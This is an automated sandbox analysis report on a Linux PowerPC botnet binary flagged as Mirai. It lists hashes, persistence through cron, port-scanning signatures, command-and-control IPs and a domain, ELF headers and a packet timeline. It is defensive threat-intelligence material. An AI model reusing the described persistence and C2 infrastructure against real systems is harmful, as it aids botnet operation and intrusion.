Edit tour
Linux
Analysis Report
nshkppc.elf
Overview
General Information
Sample name: | nshkppc.elf |
Analysis ID: | 1577080 |
MD5: | c970abb702288d872bd58c91268bcc1f |
SHA1: | 50d693fc548f04b57a7ed81632de23e3e69249fa |
SHA256: | c23ed5855615ca018b90281c83cf749def736b7482063a8c71c89e4c8ca38730 |
Tags: | elfuser-abuse_ch |
Infos: |
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1577080 |
Start date and time: | 2024-12-18 00:02:06 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 48s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | nshkppc.elf |
Detection: | MAL |
Classification: | mal60.troj.linELF@0/1@33/0 |
- VT rate limit hit for: nshkppc.elf
Command: | /tmp/nshkppc.elf |
PID: | 6238 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | you are now apart of hail cock botnet |
Standard Error: | no crontab for root |
- system is lnxubuntu20
- nshkppc.elf New Fork (PID: 6241, Parent: 6238)
- sh New Fork (PID: 6244, Parent: 6241)
- nshkppc.elf New Fork (PID: 6246, Parent: 6238)
- nshkppc.elf New Fork (PID: 6289, Parent: 6246)
- nshkppc.elf New Fork (PID: 6248, Parent: 6238)
- cleanup
⊘No yara matches
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | ReversingLabs: |
Source: | String: |
Networking |
---|
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | Socket: | Jump to behavior |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | .symtab present: |
Source: | Classification label: |
Persistence and Installation Behavior |
---|
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior |
Source: | Stderr: no crontab for root: |
Source: | Queries kernel information via 'uname': | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 2 Scripting | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | Direct Volume Access | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Scripting | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 2 Application Layer Protocol | Traffic Duplication | Data Destruction |
⊘No configs have been found
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
16% | ReversingLabs | Linux.Backdoor.Mirai |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
kingstonwikkerink.dyn | 212.64.215.71 | true | false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false | |
80.78.26.121 | unknown | Cyprus | 37560 | CYBERDYNELR | true | |
212.64.215.71 | kingstonwikkerink.dyn | Turkey | 15395 | RACKSPACE-LONGB | false | |
91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false | |
91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
80.78.26.121 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
212.64.215.71 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
109.202.202.202 | Get hash | malicious | Unknown | Browse |
| |
91.189.91.43 | Get hash | malicious | Mirai | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
91.189.91.42 | Get hash | malicious | Mirai | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
kingstonwikkerink.dyn | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CANONICAL-ASGB | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
RACKSPACE-LONGB | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | CAPTCHA Scam ClickFix, XWorm | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
CYBERDYNELR | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Quasar | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Bazar Loader | Browse |
| ||
Get hash | malicious | Bazar Loader, BruteRatel | Browse |
| ||
Get hash | malicious | Bazar Loader, BruteRatel | Browse |
| ||
INIT7CH | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
|
⊘No context
⊘No context
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 306 |
Entropy (8bit): | 5.153013255557498 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQLvmuHaZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKw:8QjHig8SuHeeHLUHYC+GABjnOGAFkz |
MD5: | 8AD10B85198BDA5B84A0513B175224AA |
SHA1: | B990B87042999427B3FF720DA00DC21BD4ECE1E6 |
SHA-256: | BBCE4B7F1813C86B449E9E8E320F1373C5198758A987CCA19AE0705D4BA74890 |
SHA-512: | 8895448676540CB5C14F9EAE8CA17D6B7161C01392B48A2F10D54BE9880A97599043ED7DB09F9713CEDC770C86A1A467EB135C2422423439DDEAF44B9329A738 |
Malicious: | true |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 6.228109663405758 |
TrID: |
|
File name: | nshkppc.elf |
File size: | 75'204 bytes |
MD5: | c970abb702288d872bd58c91268bcc1f |
SHA1: | 50d693fc548f04b57a7ed81632de23e3e69249fa |
SHA256: | c23ed5855615ca018b90281c83cf749def736b7482063a8c71c89e4c8ca38730 |
SHA512: | ba8824900347ebf17eba829f9e1e61c630f4a24572d253bcdcaaebadd37d531788bde1336b0a04870c54d10c15cb51ab0e908d82b78110c2d60fd26e56180c42 |
SSDEEP: | 1536:hMR5ImvsygsBkvyVtIcaVCSIptg3wIq9VwbX3:haImVG+teVCHpv6X3 |
TLSH: | 3F734B42B31C0947C1A76DF0363F17D093BFAA9121E4FA84655FAB4A92B2E331546ECD |
File Content Preview: | .ELF...........................4..#......4. ...(.......................................... ... ... .......T.........dt.Q.............................!..|......$H...H......$8!. |...N.. .!..|.......?.........$...../...@..\?..... ..+../...A..$8...}).... .N.. |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 52 |
Program Header Offset: | 52 |
Program Header Size: | 32 |
Number of Program Headers: | 3 |
Section Header Offset: | 74724 |
Section Header Size: | 40 |
Number of Section Headers: | 12 |
Header String Table Index: | 11 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x10000094 | 0x94 | 0x24 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.text | PROGBITS | 0x100000b8 | 0xb8 | 0x10340 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.fini | PROGBITS | 0x100103f8 | 0x103f8 | 0x20 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.rodata | PROGBITS | 0x10010418 | 0x10418 | 0x19f4 | 0x0 | 0x2 | A | 0 | 0 | 8 |
.ctors | PROGBITS | 0x10022000 | 0x12000 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.dtors | PROGBITS | 0x10022008 | 0x12008 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.data | PROGBITS | 0x10022018 | 0x12018 | 0x344 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
.sdata | PROGBITS | 0x1002235c | 0x1235c | 0x3c | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.sbss | NOBITS | 0x10022398 | 0x12398 | 0x68 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.bss | NOBITS | 0x10022400 | 0x12398 | 0x508c | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.shstrtab | STRTAB | 0x0 | 0x12398 | 0x4b | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0x10000000 | 0x10000000 | 0x11e0c | 0x11e0c | 6.2963 | 0x5 | R E | 0x10000 | .init .text .fini .rodata | |
LOAD | 0x12000 | 0x10022000 | 0x10022000 | 0x398 | 0x548c | 3.0156 | 0x6 | RW | 0x10000 | .ctors .dtors .data .sdata .sbss .bss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 18, 2024 00:02:53.847948074 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Dec 18, 2024 00:02:59.479352951 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Dec 18, 2024 00:03:00.247157097 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Dec 18, 2024 00:03:01.821381092 CET | 59948 | 20604 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:01.900163889 CET | 48198 | 6307 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:01.940963984 CET | 20604 | 59948 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:03:01.941076994 CET | 59948 | 20604 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:01.941433907 CET | 59948 | 20604 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:02.019809008 CET | 6307 | 48198 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:02.020025969 CET | 48198 | 6307 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:02.020303965 CET | 48198 | 6307 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:02.060914040 CET | 20604 | 59948 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:03:02.061054945 CET | 59948 | 20604 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:02.139796019 CET | 6307 | 48198 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:02.139977932 CET | 48198 | 6307 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:02.180643082 CET | 20604 | 59948 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:03:02.259572983 CET | 6307 | 48198 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:04.329830885 CET | 6307 | 48198 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:04.330307961 CET | 48198 | 6307 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:04.451670885 CET | 6307 | 48198 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:11.950428963 CET | 59948 | 20604 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:12.070038080 CET | 20604 | 59948 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:03:14.581140041 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Dec 18, 2024 00:03:23.835638046 CET | 20604 | 59948 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:03:23.835951090 CET | 59948 | 20604 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:23.955632925 CET | 20604 | 59948 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:03:26.867405891 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Dec 18, 2024 00:03:29.357110023 CET | 48200 | 6307 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:29.476897955 CET | 6307 | 48200 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:29.477227926 CET | 48200 | 6307 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:29.477227926 CET | 48200 | 6307 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:29.597044945 CET | 6307 | 48200 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:29.597284079 CET | 48200 | 6307 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:29.716955900 CET | 6307 | 48200 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:30.962908983 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Dec 18, 2024 00:03:31.810190916 CET | 6307 | 48200 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:31.810702085 CET | 48200 | 6307 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:31.930454969 CET | 6307 | 48200 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:42.065046072 CET | 39992 | 17631 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:42.184648991 CET | 17631 | 39992 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:03:42.184762955 CET | 39992 | 17631 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:42.185050011 CET | 39992 | 17631 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:42.304785013 CET | 17631 | 39992 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:03:42.305005074 CET | 39992 | 17631 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:42.424700022 CET | 17631 | 39992 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:03:43.485713959 CET | 17631 | 39992 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:03:43.485972881 CET | 39992 | 17631 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:43.486048937 CET | 39992 | 17631 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:48.730323076 CET | 52236 | 19269 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:48.850014925 CET | 19269 | 52236 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:48.850105047 CET | 52236 | 19269 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:48.850318909 CET | 52236 | 19269 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:48.863920927 CET | 59958 | 20604 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:48.969991922 CET | 19269 | 52236 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:48.970124960 CET | 52236 | 19269 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:48.983695984 CET | 20604 | 59958 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:03:48.983808041 CET | 59958 | 20604 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:48.983922958 CET | 59958 | 20604 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:49.089766979 CET | 19269 | 52236 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:49.104535103 CET | 20604 | 59958 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:03:49.104752064 CET | 59958 | 20604 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:49.225264072 CET | 20604 | 59958 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:03:51.160392046 CET | 19269 | 52236 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:51.160701990 CET | 52236 | 19269 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:51.280330896 CET | 19269 | 52236 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:53.295187950 CET | 20604 | 59958 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:03:53.295401096 CET | 59958 | 20604 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:53.295547962 CET | 59958 | 20604 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:03:55.535494089 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Dec 18, 2024 00:03:56.403908968 CET | 36252 | 5232 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:56.523616076 CET | 5232 | 36252 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:56.523715973 CET | 36252 | 5232 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:56.523938894 CET | 36252 | 5232 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:56.643446922 CET | 5232 | 36252 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:56.643549919 CET | 36252 | 5232 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:56.763103008 CET | 5232 | 36252 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:58.824863911 CET | 5232 | 36252 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:03:58.825057030 CET | 36252 | 5232 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:03:58.944761992 CET | 5232 | 36252 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:03.548079014 CET | 33524 | 24374 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:03.667795897 CET | 24374 | 33524 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:03.667959929 CET | 33524 | 24374 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:03.668004990 CET | 33524 | 24374 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:03.787607908 CET | 24374 | 33524 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:03.787801027 CET | 33524 | 24374 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:03.907618046 CET | 24374 | 33524 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:04.077065945 CET | 54924 | 8322 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:04.196796894 CET | 8322 | 54924 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:04.197061062 CET | 54924 | 8322 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:04.197129011 CET | 54924 | 8322 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:04.316751003 CET | 8322 | 54924 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:04.317012072 CET | 54924 | 8322 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:04.436630011 CET | 8322 | 54924 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:04.972639084 CET | 24374 | 33524 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:04.972949982 CET | 33524 | 24374 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:04.973050117 CET | 33524 | 24374 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:06.496885061 CET | 8322 | 54924 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:06.497392893 CET | 54924 | 8322 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:06.617141008 CET | 8322 | 54924 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:10.217542887 CET | 41094 | 1851 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:10.337179899 CET | 1851 | 41094 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:10.337462902 CET | 41094 | 1851 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:10.337584972 CET | 41094 | 1851 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:10.458101034 CET | 1851 | 41094 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:10.458504915 CET | 41094 | 1851 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:10.578316927 CET | 1851 | 41094 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:11.740361929 CET | 34352 | 1402 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:11.860220909 CET | 1402 | 34352 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:11.860353947 CET | 34352 | 1402 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:11.860510111 CET | 34352 | 1402 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:11.980118990 CET | 1402 | 34352 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:11.980433941 CET | 34352 | 1402 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:12.101604939 CET | 1402 | 34352 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:12.703480959 CET | 1851 | 41094 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:12.703833103 CET | 41094 | 1851 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:12.823414087 CET | 1851 | 41094 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:14.215617895 CET | 1402 | 34352 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:14.216130972 CET | 34352 | 1402 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:14.335932970 CET | 1402 | 34352 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:17.947736025 CET | 44076 | 16854 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:18.067291021 CET | 16854 | 44076 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:18.067418098 CET | 44076 | 16854 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:18.067500114 CET | 44076 | 16854 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:18.187030077 CET | 16854 | 44076 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:18.187145948 CET | 44076 | 16854 | 192.168.2.23 | 80.78.26.121 |
Dec 18, 2024 00:04:18.306680918 CET | 16854 | 44076 | 80.78.26.121 | 192.168.2.23 |
Dec 18, 2024 00:04:19.485060930 CET | 58394 | 24738 | 192.168.2.23 | 212.64.215.71 |
Dec 18, 2024 00:04:19.604729891 CET | 24738 | 58394 | 212.64.215.71 | 192.168.2.23 |
Dec 18, 2024 00:04:19.604840994 CET | 58394 | 24738 | 192.168.2.23 | 212.64.215.71 |
